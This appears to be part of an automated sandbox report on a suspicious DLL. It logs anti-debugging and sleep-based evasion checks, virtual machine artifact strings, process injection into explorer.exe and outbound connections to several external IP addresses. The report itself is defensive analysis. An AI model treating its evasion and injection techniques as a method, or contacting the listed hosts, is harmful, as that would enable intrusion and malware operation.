Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Contains functionality to query network adapater information

Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	22_2_013A5904
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	22_2_013A6984
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,	22_2_013ADDF8

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 5001	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 4879	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 468	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 8936	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 694	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 672	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\System32\rundll32.exe

API coverage: 2.5 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\loaddll64.exe TID: 6660	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7324	Thread sleep count: 5001 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7324	Thread sleep time: -300060000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7324	Thread sleep count: 4879 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7324	Thread sleep time: -292740000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7704	Thread sleep time: -224000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7728	Thread sleep time: -46800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7704	Thread sleep time: -8936000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800192B8 FindFirstFileExW,	6_2_00000001800192B8
Source: C:\Windows\explorer.exe	Code function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW,	22_2_013A8BA8
Source: C:\Windows\explorer.exe	Code function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	22_2_013A1A08
Source: C:\Windows\explorer.exe	Code function: 22_2_013ADCE0 FindFirstFileW,	22_2_013ADCE0

Source: C:\Windows\System32\loaddll64.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000012.00000002.2938154508.0000029211558000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000016.00000002.2940539964.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: explorer.exe, 00000016.00000002.2940539964.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000016.00000002.2942821965.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\explorer.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\explorer.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_00000001800118B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_00000001800118B8

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018000D1F4 GetLastError,IsDebuggerPresent,OutputDebugStringW,

6_2_000000018000D1F4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018001AC34 GetProcessHeap,

6_2_000000018001AC34

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800118B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00000001800118B8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000E470 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_000000018000E470
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000D638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_000000018000D638

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 138.124.183.215 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 3.69.236.35 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 91.194.11.183 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 54.175.181.104 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 95.164.68.73 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.16.155 443	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory allocated: C:\Windows\explorer.exe base: 13A0000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Windows\System32\rundll32.exe	Code function: 18_3_00007DF4F0240100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,		18_3_00007DF4F0240100
Source: C:\Windows\System32\rundll32.exe	Code function: 18_2_000000026E7A1370 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,		18_2_000000026E7A1370

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\rundll32.exe

Thread created: C:\Windows\explorer.exe EIP: 13A0000

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 13A0000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\rundll32.exe

Memory written: PID: 2580 base: 13A0000 value: 4D

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 6516	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 6516	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 6516	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 6516	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 6516	Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\rundll32.exe

Thread register set: 6516 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 13A0000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1

Jump to behavior

Source: explorer.exe, 00000016.00000002.2942821965.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940227099.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
